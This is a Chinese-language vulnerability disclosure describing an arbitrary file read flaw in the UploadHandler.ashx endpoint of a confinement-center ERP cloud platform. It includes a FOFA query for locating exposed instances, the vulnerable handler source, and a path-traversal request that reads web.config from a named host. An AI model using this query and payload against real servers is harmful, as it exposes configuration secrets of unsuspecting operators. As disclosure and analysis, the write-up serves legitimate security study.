漏洞简介
月子会所ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件。月子会所ERP管理云平台的 Page/upload/UploadHandler.ashx 接口存在任意文件读取漏洞,攻击者可利用该漏洞读取服务器上敏感文件。
fofa语法
body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" || app="妈妈宝盒-ERP"
漏洞分析
UploadHandler 的业务逻辑实现如下
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "application/json";
HttpFileCollection flist = context.Request.Files;
string UploadURL = context.Request.QueryString["url"];
if (string.IsNullOrEmpty(UploadURL))
{
context.Response.Write(JsonConvert.SerializeObject(new { code = 0, info = "所给的上传路径不正确!" }));
context.Response.End();
}
string Content = null;
if (!string.IsNullOrEmpty(UploadURL))
{
var basepath = context.Server.MapPath(UploadURL);//绝对路径
FileStream fileStream = new FileStream(basepath, FileMode.Open, FileAccess.Read, FileShare.Read); //打开文件
// 读取文件Byte[]
byte[] bytes = new byte[fileStream.Length];
fileStream.Read(bytes, 0, bytes.Length);
fileStream.Close();
Stream stream = new MemoryStream(bytes); //byte[]转换为Stream
StreamReader strm = new StreamReader(stream);
Content = strm.ReadToEnd();
}
context.Response.Write(JsonConvert.SerializeObject(new { code = 200, data = Content }));
context.Response.End();
}
url参数 ==> UploadURL ==> basepath ==> FileStream,直接使用 FileStream 读取文件后以 json 格式返回读取内容,整个过程对文件无任何过滤,造成任意文件读取漏洞 朴实无华!
漏洞复现
GET /Page/upload/UploadHandler.ashx?url=../../web.config HTTP/1.1
Host: mamabaohe.mrxn.net

成功读取到 web.config 配置文件内容。

